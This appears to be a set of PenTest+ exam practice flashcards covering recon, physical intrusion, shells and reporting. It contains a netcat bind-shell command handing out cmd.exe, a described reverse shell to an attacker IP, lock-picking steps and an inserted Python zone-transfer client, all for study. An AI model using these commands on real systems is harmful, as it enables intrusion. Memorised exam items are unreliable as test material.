CompTIA PenTest+ Certification PT0-001: Practice Test #1 (Total Seminars) Flashcards
A methodical approach to defeating a lock, which technique relies on interacting with a lock and its pins in series, addressing them in the order in which they bind the most when pressure is applied with a torque wrench? A.Tailgating B.Bumping C.Single pin picking D.Double ball
C.Single pin picking
Explanation
Correct Answer:
Single pin picking is correct. Single pin picking is a slower, more methodical approach to lockpicking that can produce great results, but is costly in terms of time required and the potential for exposure. Put simply, a lock is probed with a pick while tension is applied with a torque wrench; the pin that binds the most is lifted into a set position while the plug is rotated further, locking the driver pin in place. At this point, another pin begins to bind, making it the new target. This process repeats until all pins are set and the plug completes its turn, unlocking the lock.
Incorrect Answers:
Bumping is incorrect because “bumping” is a lock-picking technique that relies on the use of specially made “bump keys” and a tool called a bump hammer, which is used to “bump” the bump key while attempting to turn the plug; conventional wisdom considers it faster than single pin picking, but louder.
Double ball is incorrect because a double ball is a specific type of pick, rather than a picking technique. Ball and double ball picks are meant to be used when picking locks that use wafers as the main binding mechanism, rather than pins. This typically includes desks, file cabinets, and even some glove boxes in cars.
Tailgating is incorrect because tailgating is used to gain access to a facility after an authorized individual has legitimately opened an access point, rather than a direct attempt to defeat a security mechanism. In these situations basic courtesy becomes a security flaw: people are quick to hold a door open for a co-worker, or even for someone who simply appears to belong, even though security policy typically requires every employee to swipe their own access badge each time they enter a controlled area.
This category of distributed DoS attack focuses on oversaturating server resources, with its severity measured in packets per second (Pps): A.Protocol attack B.ICMP flooding C.Application layer attack D.Volume-based attack
A.Protocol attack
Explanation
Correct Answer: Protocol attack is correct. A protocol attack is one that is focused on locking up a target system by consuming all available system resources, such as processing capability or memory. Attack severity is measured in packets per second, or Pps.
Incorrect Answers:
Application layer attack is incorrect because an application layer attack attempts to crash a specific service on a target system, rather than bring the entire system down by consuming its available CPU, memory, or storage assets. Application layer attacks are measured in requests per second, or Rps.
Volume-based attack is incorrect because a volume-based attack is one that attempts to consume a target’s available bandwidth (rather than system CPU cycles, memory, or storage), effectively knocking it offline. Volume-based attacks are measured in bits per second, or bps.
ICMP flooding is incorrect because ICMP flooding is a specific example of a volume-based attack, which is itself an incorrect answer. ICMP flooding is a denial of service attack method that focuses on consuming available network bandwidth by filling it with constant ICMP echo requests, effectively wasting bandwidth that would otherwise be used by legitimate traffic. Since these attacks do not target server CPU, memory, or storage resources, this answer is incorrect.
As defined by the OWASP Mobile Security Testing Guide, which core feature of iOS security architecture serves as a restricted area from which applications are executed? A.Sandbox B.Encryption and data protection C.Secure boot D.Hardware security
A.Sandbox
Explanation
Correct Answer:
Sandbox is correct. The sandbox is the restricted area where applications are executed. All applications are sandboxed from each other and core OS files, preventing spillage of information from both lateral means (that is, from another user app) and from higher levels of privilege (that is, from higher order operating system functions).
Incorrect Answers:
Hardware security is incorrect because the hardware security feature is the dedicated cryptographic hardware that secures the device: two AES-256 keys, the Group ID (GID, shared by all devices of a class) and the Unique ID (UID, unique to each device), are fused into the application processor and Secure Enclave at manufacture and cannot be read by software or firmware, so encrypted data is tied to the physical device. This protects data against tampering and extraction; it is not the mechanism that isolates applications from one another.
Secure Boot is incorrect because Secure Boot (or more completely, the Secure Boot chain) starts from an Apple root CA public key baked into the Boot ROM; each stage of the boot process verifies the signature of the next before handing off, ensuring the firmware and kernel have not been tampered with.
Encryption and data protection is incorrect because encryption, the use of passcodes, and other data protection mechanisms ensure data confidentiality by preventing unauthorized access to encrypted data.
Which command (valid in both *nix and Windows) can resolve a domain name to its IP address? A.'dig' B.'nslookup' C.'host' D.'ping'
B.’nslookup’
Explanation
Correct Answer:
‘nslookup’ is correct. The nslookup command is available on both Windows and *nix systems and queries DNS servers to resolve a domain name to its associated IP address, and vice versa.
Incorrect Answers:
‘ping’ is incorrect because the ping command only sends ICMP echo requests to a host to confirm that it is reachable; it prints the address it resolved along the way, but name resolution is a side effect of reaching the host, not the command’s function.
‘dig’ and ‘host’ are incorrect because although both dig and host are commands that can resolve a domain name to its IP address, they are only valid in *nix operating systems and are not recognized by default on Windows operating systems.
A proxy host should be configured as what type of proxy in proxychains to enable DNS queries to go through the proxy host's network? A.HTTP B.SOCKS4 C.SOCKS5 D.DNS
C.SOCKS5
Explanation
Correct Answer:
SOCKS5 is correct. Configuration as a SOCKS5 proxy will allow proxychains to support both TCP and UDP protocols, including DNS.
Incorrect Answers:
DNS is incorrect because DNS proxies will only handle DNS queries and relay that information back to the requesting host or service. In addition, DNS proxies are not a type of proxy that can be configured in proxychains.
SOCKS4 is incorrect because a SOCKS4 proxy will only process TCP-based protocols such as SSH and HTTPS, making it unsuitable for support of UDP-based protocols such as DNS and SNMP.
HTTP is incorrect because HTTP proxies are built for HTTP(S) traffic; even where a proxy permits CONNECT tunnelling of other TCP protocols such as SSH or SMB, it offers no UDP support, so it cannot carry UDP-based protocols such as DNS or SNMP.
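An added configuration example, not from the original page (the proxy address 10.1.2.50:1080 is an assumption for illustration): a proxychains.conf that sends both TCP connections and name lookups through a SOCKS5 host. One caveat a practitioner should know: proxychains hooks the connect() calls of TCP sockets and does not forward UDP at all; its proxy_dns option satisfies lookups by tunnelling a DNS query over TCP through the chain, so without proxy_dns, hostnames still leak to the local resolver even when the proxy is SOCKS5.

```conf
# Added example (not from the page): /etc/proxychains.conf excerpt.
# 10.1.2.50:1080 is an assumed SOCKS5 listener on the pivot host.
strict_chain
proxy_dns                  # resolve hostnames through the chain, not the local resolver
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# type   host        port
socks5   10.1.2.50   1080
```

Tools are then run as proxychains4 <command>; proxy_dns is the line that keeps lookups inside the tunnel, and the proxy type decides whether the far end can carry what the tool sends.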
Shodan and Censys are examples of \_\_\_\_\_\_\_\_\_\_, which enable discovery of publicly accessible Internet-connected devices. (Fill in the blank.) A.Maltego transforms B.Google Dorks C.Data miners D.IoT search engines
D.IoT search engines
Explanation
Correct Answer:
Internet of Things (IoT) search engines is correct. Shodan and Censys are examples of Internet of Things (IoT) search engines.
Incorrect Answers:
Google dorks is incorrect because a Google dork is a loaded search term that returns interesting sites, documents, or resources when entered into the Google search engine.
Maltego transforms is incorrect because Maltego transforms are external resources or APIs that expand the native capabilities of Maltego.
Data miners is incorrect because the term “data miners” is much broader than can be represented solely by “IoT search engines,” leaving this answer inadequate.
Consider the following nmap output: ``` # Ports scanned: TCP(10;21-23,25,80,110,139,443,445,3389) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: 10.1.2.3 () Status: Up Host: 10.1.2.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///, 110/closed/tcp//pop3///, 139/open/tcp//netbios-ssn///, 443/closed/tcp//https///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server/// OS: Linux 2.6.9 - 2.6.33 Seq Index: 198 IP ID Seq: All zeros # Nmap done at Sat May 12 09:41:47 2018 -- 1 IP address (1 host up) scanned in 14.49 seconds ``` Notice the OS declaration toward the bottom of the scan output. Given the body of output present, which of the following options was used to attempt OS fingerprinting? A.-O B.-sVC C.-Pn D.-A
A.-O
Explanation
Correct Answer:
‘-O’ is correct. The -O flag enables OS fingerprinting, which is what produced the OS: line. Be careful with questions such as this one: both -O and -A perform OS fingerprinting, but -A also turns on version detection (-sV), the default NSE scripts (-sC), and traceroute. The output above shows none of that: every port entry has an empty version field (the grepable format is port/state/protocol/owner/service/rpc info/version/), and there is no script output. Note that grepable (-oG) output never carries NSE results at all, so the empty version fields are the more reliable tell that -A was not used.
Incorrect Answers:
‘-A’ is incorrect because -A bundles OS fingerprinting with version detection, the default NSE scripts, and traceroute; the empty version fields and the absence of script output in the scan above indicate that none of those ran.
‘-sVC’ is incorrect because -sVC (shorthand for -sV -sC) runs version detection and the default NSE scripts but does not attempt OS fingerprinting, and in any case none of its output is present.
‘-Pn’ is incorrect because -Pn skips host discovery and treats every target as up; it has nothing to do with OS fingerprinting.
During a penetration test, you secure a meeting with a middle manager and ask for a tour of their facility. During the tour, they fail to notice the RFID antenna hidden on your person, swiping authorization data from employee access cards. This is an example of which of the following? A.Scrubbing B.Shoulder surfing C.Piggybacking D.Badge Cloning
D.Badge Cloning
Explanation
Correct Answer:
Badge cloning is correct. Badge cloning is the practice of harvesting employee badge information usually with a high-gain RFID antenna for later replay attacks by writing it to a new access card.
Incorrect Answers:
Piggybacking is incorrect because piggybacking is a synonym for tailgating, a practice used to gain access to a facility after an authorized individual has legitimately opened an access point, such as by swiping an RFID badge to disengage a magnetic door lock, rather than a means of obtaining a functional copy of a working RFID badge.
Shoulder surfing is incorrect because shoulder surfing is the covert observance of individuals for the purpose of collecting sensitive information, and it has no need for the use of an RFID antenna.
Scrubbing is incorrect because scrubbing (sometimes referred to as “raking”) is a lock-picking technique performed by dragging a pick back and forth across the key pins in a lock while varying the tension used on the torque wrench, rather than a technique used to copy working RFID badges.
The ability of theHarvester to identify hosts, IP addresses, and e-mail addresses based on a domain name alone makes it most valuable for which penetration testing methodology? A.Red team B.White box C.Gray box D.Black box
D.Black box
Explanation
Correct Answer:
Black box is correct. The ability to identify hosts, IP addresses, and e-mail addresses based on nothing more than a domain name means theHarvester can be exceedingly valuable in penetration tests where one is provided little or no information. Because the black box testing methodology is marked by extremely limited starting information being provided to the tester, this is the correct answer.
Incorrect Answers:
Gray box and White box are incorrect because gray and white box testing both begin with some functional knowledge about the target environment. This does not mean theHarvester is useless during gray and white box engagements; it is simply that because the tool excels at finding information with very little input, and because gray and white box assessments generally provide a significant amount of information to the penetration tester, its output will be less revealing in those engagements than in a black box assessment.
Red team is incorrect because red team testing is a type of penetration test, rather than a penetration testing methodology.
For which of the following situations would it be most fitting to recommend onboarding additional personnel as a mitigation measure?
A.The organization relies on hardware and operating systems that have been termed EOL by the vendor
B.The organization's network environment runs on a flat topology, with all assets relying on the 172.16.x.x/12 network for communication
C.The organization has fences to establish a perimeter boundary, but numerous, frequently moved shipping containers in the shipping area cause a number of blind spots in remote surveillance
D.System patches are applied at the whim of the owning manager, resulting in multiple disparate software versions and OS distributions requiring support from the server support team
C.The organization has fences to establish a perimeter boundary, but numerous, frequently moved shipping containers in the shipping area cause a number of blind spots in remote surveillance
Explanation
Correct Answer:
The organization has fences to establish a perimeter boundary, but numerous, frequently moved shipping containers in the shipping staging area cause a number of blind spots in remote surveillance is correct. In the situation described, the organization has taken care to protect its boundaries with fencing and cameras, but the use case for a shipping yard results in blind spots in camera coverage. Of the choices given, this is the most appropriate situation to recommend additional personnel in response to the vulnerability present.
Incorrect Answers:
The organization’s network environment runs on a flat topology, with all assets relying on the 172.16.x.x/12 network for internal communication is incorrect because while additional personnel may be necessary to fix the issue, the core problem is not a personnel issue. A flat network is best fixed by a technological solution: properly segmenting the network via subnetting and VLAN assignments, with filtering between the segments.
System patches are applied at the whim of the owning manager, resulting in multiple disparate software versions and OS distributions requiring support from the server support team is incorrect because patches being applied at the say-so of the owner of a system or server is indicative of a lack of a patch management plan in the client environment rather than a lack of adequate personnel to deploy software and system patches; in this case, the core problem is procedural, and the implementation of an effective patch management plan would be the best recommendation for mitigation of the issue.
The organization relies on hardware and operating systems that have been termed EOL by the vendor is incorrect because reliance upon end-of-life (EOL) hardware and software is not a problem that can be solved by throwing personnel at it. Here, the core problem is technological in nature, and the acquisition of newer, vendor-supported hardware and software is the best recommendation for mitigation.
During the course of a penetration test, you discover that the credentials you were provided for a web application are invalid. Which of the following describes the best course of action in this scenario?
A.Consult the master service agreement to identify the client organization's named point of contact, and reach out to them for assistance in resolving the issue
B.Move on to another target in the engagement scope and note that the credentials were invalid in the penetration test report
C.Consult the RoE to identify the client organization's named point of contact, and reach out to them for assistance in resolving the issue
D.Restrict all testing activities to those in an uncredentialed context and annotate the discrepancy in the penetration test report
C.Consult the RoE to identify the client organizations named point of contact, and reach out to them for assistance in resolving the issue
Explanation
Correct Answer:
Consult the RoE to identify the client organization’s named point of contact, and reach out to them for assistance in resolving the issue is correct. Any issues encountered during the execution of a penetration test should be communicated to the named point of contact as listed in the RoE.
Incorrect Answers:
Consult the master service agreement to identify the client organization’s named point of contact, and reach out to them for assistance in resolving the issue is incorrect because the communication escalation path listing points of contact is found in the RoE rather than in a master service agreement (MSA); the MSA governs the overall business relationship between the parties, not the conduct of a specific engagement.
Move on to another target in the engagement scope and note that the credentials were invalid in the penetration test report and Restrict all testing activities to those in an uncredentialed context and annotate the discrepancy in the penetration test report are incorrect because failing to test an in-scope target (or limiting testing to what can be done without credentials) over a minor, easily corrected account problem would be an abdication of duty on the part of the penetration tester. The point of contact exists to reduce friction and maximize the productivity of the test; leaving that resource untapped would be a failure on the tester’s part and would diminish the overall quality of the assessment.
Which command will establish a bound shell on a Windows host? Assume that the nc
executable is in the present working directory, the attacking system IP address is 10.1.2.2, and the victim IP address is 10.1.4.4.
A.’nc.exe -nv 10.1.4.4 4444 -e C:\Windows\System32\cmd.exe’
B.’nc.exe -nvlp 10.1.4.4 4444 cmd.exe’
C.’nc.exe -nv 10.1.2.2 4444 C:\Windows\System32\cmd.exe’
D.’nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe’
D.’nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe’
Explanation
Correct Answer:
‘nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe’ is correct. A bound (bind) shell needs, at a minimum, the -l flag to make netcat listen rather than connect out, the -p flag with the port number to listen on, and the -e flag naming the program whose input and output are attached to the connection (here, Windows’ cmd.exe). -n suppresses DNS lookups and -v makes netcat verbose; neither affects the shell itself. The attacker then connects from 10.1.2.2 with nc 10.1.4.4 4444 and is handed the command prompt.
Incorrect Answers:
‘nc.exe -nv 10.1.2.2 4444 C:\Windows\System32\cmd.exe’ is incorrect because with no -l or -p flag netcat does not listen; it connects out to the attacking system at 10.1.2.2, which is the shape of a reverse shell, not a bound one. It is also missing the -e flag, so cmd.exe would not be executed across the connection; netcat would treat it as a stray argument.
‘nc.exe -nvlp 10.1.4.4 4444 cmd.exe’ is incorrect because -p expects a port number, not an IP address, so netcat rejects the command line rather than binding a listener. Even if the arguments were parsed, there is no -e before cmd.exe, so nothing would be executed over the connection.
‘nc.exe -nv 10.1.4.4 4444 -e C:\Windows\System32\cmd.exe’ is incorrect because, without -l and -p, this is an outbound connection rather than a listener, and the address it connects to is the victim’s own (10.1.4.4), where nothing is listening on port 4444. Pointed at the attacker’s 10.1.2.2 instead, it would be a working reverse shell to a listener started there with nc -nvlp 4444; as stated previously, a bound shell requires the -l and -p flags in addition to -e.
In what section of a penetration test report would one expect to find a high-level overview of the results of the test, written specifically for nontechnical stakeholders? A.Methodology B.Conclusion C.Executive summary D.Appendixes
C.Executive summary
Explanation
Correct Answer:
Executive summary is correct. The executive summary is a less technical overview of the findings of a penetration test report, geared toward clearly communicating the findings to client personnel who may not have the background or training necessary to fully understand all the minutiae of the vulnerabilities discovered.
Incorrect Answers:
Conclusion is incorrect because the conclusion of a penetration test report consists of supplemental material that supports the findings of that penetration test, but it is not critical to understand its contents. This can consist of figures and illustrations, appendixes that contain the results of port scans, or other granular details used during the course of the test. As such, this is far from a nontechnical section of the report, and is therefore incorrect.
Methodology is incorrect because the methodology section of a penetration test report presents information regarding testing techniques and practices used as well as the decision-making processes that guided information collection, analysis, and risk evaluation. As this is far more in the weeds than would be appropriate for a nontechnical summary, it is incorrect.
Appendixes is incorrect because appendixes are a component of the conclusion of a penetration test report, and they detail the results of port scans, automated vulnerability scanners deployed in an effort to find low-hanging fruit, and other fine details. As stated previously, this is a much more detailed section of the penetration test report than is appropriate for nontechnical personnel, making this answer incorrect.
What is the function of an organization’s IT department in relation to a penetration test?
A.Patching systems before the penetration testers can launch exploits
B.Providing penetration testers with software tools needed for the assessment
C.Communication of security policies and remediation of incidental outages
D.Providing final, written authorization for penetration test
C.Communication of security policies and remediation of incidental outages
Explanation
Correct Answer:
Communication of security policies and remediation of incidental outages is correct. During a penetration test, an organization’s IT department serves to communicate security policies and remediate any incidents that may occur during the engagement.
Incorrect Answers:
Patching systems before the penetration testers can launch exploits is incorrect because patching systems is certainly within the traditional job scope of an IT department, but with respect to a penetration test it is expected that systems will not be subjected to any configuration changes or updates for the duration of the assessment.
Providing penetration testers with software tools needed for the assessment is incorrect because provisioning of tools required by the penetration testing team is outside of the duties of the IT department as well; although the IT department may coordinate or configure network or VPN access and necessary accounts for credentialed scanning, penetration testers should generally expect to bring their own tools to an engagement.
Providing final, written authorization for the penetration test is incorrect because the signing of the written authorization letter is a function expected of an organization’s executive management or legal personnel.
During a physical penetration test, you identify that a magnetic door designed to simplify employee egress from a secure area is rather easily defeated; warming up a sheet of paper by holding it close to your body and threading it through the crack between the doors is enough to trip the thermal sensor used to unlock the door from the inside. From here, it is possible to simply pull the door open. Of the following options, this is most likely an example of what? A.Lock bypass B.Lock picking C.Badge cloning D.Fence jumping
A.Lock bypass
Explanation
Correct Answer:
Lock bypass is correct. By tricking the system into thinking an employee is attempting to exit the secured area (through passing a heated sheet of paper through the sensor area of a thermal sensor), the lock is defeated. Because the lock was not interacted with in the manner expected by its manufacturer, this would be an example of a lock bypass.
Incorrect Answers:
Fence jumping is incorrect because fence jumping is used to obtain unauthorized access to an area that has been cordoned off. While this can be a way to get around a lock, a lock bypass specifically refers to unlatching the locking mechanism without interacting with it as intended by the manufacturer, making this answer incorrect.
Lock picking is incorrect because lock picking is a means of defeating physical locks that requires direct interaction with the locking mechanism in question.
Badge cloning is incorrect because badge cloning is the practice of harvesting employee badge information with a high-gain antenna for later replay attacks by writing this information to a new access card, and does not describe a means of defeating locks, directly or otherwise.
Per Microsoft's published threat modeling procedures, this step consists of a granular breakdown and analysis of the technologies used by an organization, marked by scrutiny of entry points (such as network ports or protocols) and trust boundaries between interconnected systems. A.Document the threats B.Decompose the application C.Rate the threats D.Identify threats
B.Decompose the application
Explanation
Correct Answer:
Decompose the application is correct. The definition provided best describes the third step of Microsoft’s threat modeling process: decomposing the application. This step consists of a granular breakdown and analysis of the technologies used by an organization, marked by scrutiny of entry points (such as network ports or protocols) and trust boundaries between interconnected systems; the goal in this step is to develop a security profile that categorizes areas of the architecture that may be susceptible to a general type of vulnerability.
Incorrect Answers:
Identify threats is incorrect because identification of threats is the fourth step in Microsoft’s threat modeling framework and is marked by the categorization of external and internal threats to an organization. The determination of where threats are found, how they can be exploited, and the identification of agents capable of exploiting them are crucial steps that can greatly aid the process of bolstering an organization’s defense posture.
Rate the threats is incorrect because rating the threats is the last step and is often very subjective to the client and the type of environment. Threats are usually assigned a general threat value, such as high, medium, or low. This may be accompanied by a numeric value derived from a simple formula, such as Risk = (Probability) * (Damage Potential).
Document the threats is incorrect because documenting threats is the fifth step and consists of matching threats, threat actors, and vulnerabilities to possible targets within the organization’s own architecture.
A zone transfer is a reconnaissance technique that elicits information from what service? A.LLMNR B.HTTP C.DNS D.SFTP
C.DNS
Explanation
Correct Answer:
DNS is correct. DNS answers ordinary queries on UDP/53 and falls back to TCP/53 for responses too large for a single UDP datagram; zone transfers (AXFR) are always carried over TCP/53. Zone transfers have a legitimate use in replicating a zone to secondary name servers, but a server that permits them to arbitrary clients hands an attacker a complete listing of the zone’s hosts and records.
Incorrect Answers:
The other choices are incorrect. Zone transfers are not a feature of HTTP, LLMNR, or SFTP. HTTP is the unencrypted protocol used to serve and access websites and web applications. LLMNR is a protocol derived from the DNS packet format that lets hosts on the same local link resolve each other’s names without a DNS server. SFTP is the SSH File Transfer Protocol, a file transfer protocol that runs over SSH; despite the name it is not FTP tunnelled over SSH.
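An added example, not from the original page: the AXFR exchange at the wire level in Python. It builds the query (QTYPE 252), adds the 2-byte length prefix that DNS over TCP requires, and decodes the answer records, including the name-compression pointers real servers use. axfr() performs a live transfer (network required, so it is not exercised offline) and raises when the server answers a non-zero RCODE, which is what a correctly configured server does (RCODE 5, REFUSED). build_sample_response() is a constructed reply, not a capture, so the decoder can be run without a server; the zone and addresses in it are illustrative.

```python
"""Build, send and decode a DNS zone-transfer (AXFR) request over TCP/53 (added example)."""
import socket
import struct

QTYPE_AXFR = 252
QTYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 15: "MX", 16: "TXT", 28: "AAAA"}


def encode_name(name):
    """'example.com' -> b'\\x07example\\x03com\\x00' (RFC 1035 label format)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_axfr_query(zone, txid=0x1234):
    # Header: ID, flags 0 (standard query), QDCOUNT=1, ANCOUNT/NSCOUNT/ARCOUNT=0
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, 1)


def tcp_frame(msg):
    """DNS over TCP prefixes every message with its 2-byte big-endian length."""
    return struct.pack("!H", len(msg)) + msg


def decode_name(msg, off):
    """Decode a possibly-compressed name; return (name, offset after the field)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # compression pointer to an earlier name
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", (end if jumped else off)


def parse_records(msg):
    """Return [(name, type, ttl, value)] for the answer section of one message."""
    _txid, _flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                            # skip the echoed question
        _, off = decode_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata_off, off = off, off + rdlen
        if rtype == 1:
            value = ".".join(str(b) for b in msg[rdata_off:off])
        elif rtype in (2, 5):
            value, _ = decode_name(msg, rdata_off)
        elif rtype == 6:                           # SOA: MNAME RNAME SERIAL ...
            mname, o = decode_name(msg, rdata_off)
            rname, o = decode_name(msg, o)
            value = f"{mname} {rname} {struct.unpack('!I', msg[o:o + 4])[0]}"
        else:
            value = msg[rdata_off:off].hex()
        records.append((name, QTYPE_NAMES.get(rtype, str(rtype)), ttl, value))
    return records


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection mid-transfer")
        buf += chunk
    return buf


def axfr(zone, server, port=53, timeout=10):
    """Live transfer (needs network). The zone arrives as one or more messages
    bracketed by the SOA record; a well-configured server answers RCODE 5 (REFUSED)."""
    records, soa_seen = [], 0
    with socket.create_connection((server, port), timeout=timeout) as s:
        s.sendall(tcp_frame(build_axfr_query(zone)))
        while soa_seen < 2:
            (length,) = struct.unpack("!H", _recv_exact(s, 2))
            msg = _recv_exact(s, length)
            rcode = struct.unpack("!H", msg[2:4])[0] & 0xF
            if rcode != 0:
                raise RuntimeError(f"transfer failed, RCODE={rcode}")
            batch = parse_records(msg)
            soa_seen += sum(1 for r in batch if r[1] == "SOA")
            records.extend(batch)
    return records


def build_sample_response():
    """Constructed reply (not a capture): SOA, NS, A, SOA for example.com, using
    compression pointers (0xC00C) back to the zone name at offset 12."""
    question = build_axfr_query("example.com")[12:]
    msg = struct.pack("!HHHHHH", 0x1234, 0x8400, 1, 4, 0, 0) + question   # QR|AA set
    zone = b"\xc0\x0c"
    soa = (encode_name("ns1.example.com") + encode_name("hostmaster.example.com")
           + struct.pack("!IIIII", 2024010101, 3600, 900, 604800, 300))

    def rr(name, rtype, rdata, ttl=3600):
        return name + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata

    return (msg + rr(zone, 6, soa) + rr(zone, 2, encode_name("ns1.example.com"))
            + rr(b"\x03www" + zone, 1, bytes([93, 184, 216, 34])) + rr(zone, 6, soa))


if __name__ == "__main__":
    for rec in parse_records(build_sample_response()):
        print(*rec)
```

The same query is what dig axfr @ns1.example.com example.com sends; the part worth internalising is the TCP length prefix and the fact that a zone is complete only once the SOA record has appeared a second time.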
The `use` command in recon-ng is an alias for which other command? A.'search' B.'set' C.'reload' D.'load'
D.’load’
Explanation
Correct Answer:
‘load’ is correct. The command use is an alias for the command load in recon-ng, making them functionally identical.
Incorrect Answers:
The other choices are incorrect because the commands reload, search, and set are not aliases for the command load. The command reload is used to reload all modules, search allows a user to search through available modules, and set is used to configure module options.
Of the following options, which would the best indicator that a client has requested a red team penetration test?
A.The client has requested that testing take place outside of standard business hours
B.The client has requested an assessment with a longer-than-typical duration conducted in a manner consistent with a nation-state-backed threat
C.The client requires all penetration testers to be US citizens
D.The client is a private aerospace company
B.The client has requested an assessment with a longer-than-typical duration conducted in a manner consistent with a nation-state-backed threat
Explanation
Correct Answer:
The client has requested an assessment with a longer-than-typical duration conducted in a manner consistent with a nation-state-backed threat is correct. The request for an assessment that lasts longer than is typical and is to be conducted in a manner consistent with an attack from a nation-state-backed threat actor indicates that the client has requested a red team assessment.
Incorrect Answers:
The client is a private aerospace company is incorrect because the client’s status as a private aerospace company has no bearing on the type of assessment they require in the absence of further information.
The client requires all penetration testers to be U.S. citizens is incorrect because the requirement that all penetration testers be U.S. citizens is expected when compliance with export control regulations is a factor in the assessment.
The client has requested that testing take place outside of standard business hours is incorrect because the request that testing take place outside of standard business hours has no impact on the requirement to emulate the tactics and techniques of a nation-state-level threat.
Which ATT&CK matrix category describes techniques used to bypass detection or other network protection mechanisms? Specific examples include bypassing UAC and deploying rootkits. A.Lateral movement B.Defense evasion C.Initial access D.Persistence
B.Defense evasion
Explanation
Correct Answer:
Defense evasion is correct. Defense evasion techniques described in the ATT&CK matrix are ultimately aimed toward evading detection or other network defenses. In the examples provided, bypassing UAC allows attackers to execute commands in an administrative context on Windows systems without a UAC alert notifying users, while rootkits hide the presence of malware by intercepting core operating system calls that supply key system information.
Incorrect Answers:
Initial access is incorrect because initial access techniques are used to gain initial footholds into a target network. Examples of this include spearphishing and abuse of trusted relationships with outside organizations.
Lateral movement is incorrect because lateral movement techniques facilitate an attacker’s movement throughout a target organization’s network, allowing access to and control of additional systems. Examples of this include pass-the-hash and pass-the-ticket attacks.
Persistence is incorrect because persistence techniques consist of any access, action, or configuration changes that enable an attacker to ensure they can retain a presence on the system. Examples of this include modification of user .bash_profile files and new account creation.
During a physical penetration test, you see a user entering their username and password on a company intranet web application while you glance over from behind as they type. What is this an example of? A.Shoulder surfing B.Baiting C.Pretexting D.Interrogation
A.Shoulder surfing
Explanation
Correct Answer:
Shoulder surfing is correct. Shoulder surfing is the covert observance of individuals geared toward the collection of sensitive information.
Incorrect Answers:
Pretexting is incorrect because pretexting is the creation of a reason (a pretext) for the penetration tester to be in a given place or to be asking for something.
Interrogation is incorrect because interrogation is the use of carefully asked questions to elicit information from a target.
Baiting is incorrect because baiting is a motivating factor defined by its use of means that tempt or entice a target into performing a given action.
During preparation for a phishing campaign, you identify a critical business web application that does not verify the target of a redirect included in an HTTP GET parameter. You choose to create links that route to the legitimate web service but redirect to your attacking system where you are hosting a cloned version of the application's login page that will harvest user credentials. This is an example of what type of vulnerability? A.Unauthorized API Use B.Reflected XSS C.HTTP parameter pollution D.Unvalidated redirection
D.Unvalidated redirection
Explanation
Correct Answer:
Unvalidated redirection is correct. Unvalidated redirection occurs when untrusted input is accepted by a web application in such a way that it can cause a visitor to be redirected to another site. If an attacker leverages this and links to a malicious site of their own creation, this attack could be a critical component of a successful phishing campaign, as phishing victims are more likely to trust a link that appears to be part of a site they visit frequently.
Incorrect Answers:
Reflected XSS is incorrect because reflected XSS would require a user to be tricked into clicking a malicious link that sends the payload (typically a snippet of JavaScript that steals the user’s session token or gets them to download a malicious file) to the web server; the web server then does nothing with this payload but feed it back to the victim, without storing it locally. In this instance, a malicious link is crafted and sent directly to the user, after which the intended site is loaded before redirecting the visitor to a cloned site under the attacker’s control for the purpose of harvesting credentials. As such, this answer is incorrect.
HTTP parameter pollution is incorrect because HTTP parameter pollution would require the attacker to fuzz the target web server with HTTP requests that have multiple instances of the same HTTP parameter, rather than sending a malicious link to the victim, as in the example. Recall that HTTP parameter pollution is a type of application fuzzing that specifically tests how a website handles multiple HTTP parameters with the same name. Different web servers will handle multiple identically named HTTP parameters differently, and the results of parameter pollution can range from simple error messages to authentication or input validation bypasses.
Unauthorized API use is incorrect because unauthorized API use would involve the use of a feature or interface not intended for typical end users. In this case, a standard feature (an HTTP redirect) is abused due to a lack of sanitization of user input before the redirect is processed, making this answer incorrect as well. As a refresher, unauthorized or unexpected API use can come up for numerous reasons: developers may have left a feature enabled when pushing an application into an environment, development and production environments may not be properly segregated, or developers and administrators may just find it convenient to have the functionality of the API in question available at all times.
The HIPAA regulatory framework applies to what type of organization?
A.Hospitals, health clinics, and other organizations that store patients' personal health information, or PHI
B.Stores and retailers that accept credit or debit cards as a means of payment for goods and services
C.U.S. government agencies, or organizations that do business with the U.S. government
D.Power companies, water companies, and other organizations that provide public utilities
A.Hospitals, health clinics, and other organizations that store patients' personal health information, or PHI
Explanation
Correct Answer:
Hospitals, health clinics, and other organizations that store patients’ personal health information, or PHI is correct. HIPAA regulations (those imposed by the Health Insurance Portability and Accountability Act) apply to hospitals, health clinics, and other organizations that must store the personal health information of their patients.
Incorrect Answers:
Stores and retailers that accept credit or debit cards as a means of payment for goods and services is incorrect because stores, retailers, and other organizations that accept debit or credit cards as a means of payment are subject to PCI DSS regulations.
U.S. government agencies, or organizations that do business with the U.S. government is incorrect because U.S. government agencies and organizations that do business with the U.S. government are subject to the FISMA regulatory framework.
Power companies, water companies, and other organizations that provide public utilities is incorrect because power and water companies and other public utilities do not have a dedicated regulatory framework for their security, but they may adhere to FISMA or other state or local guidelines as mandated by the appropriate legal authorities.
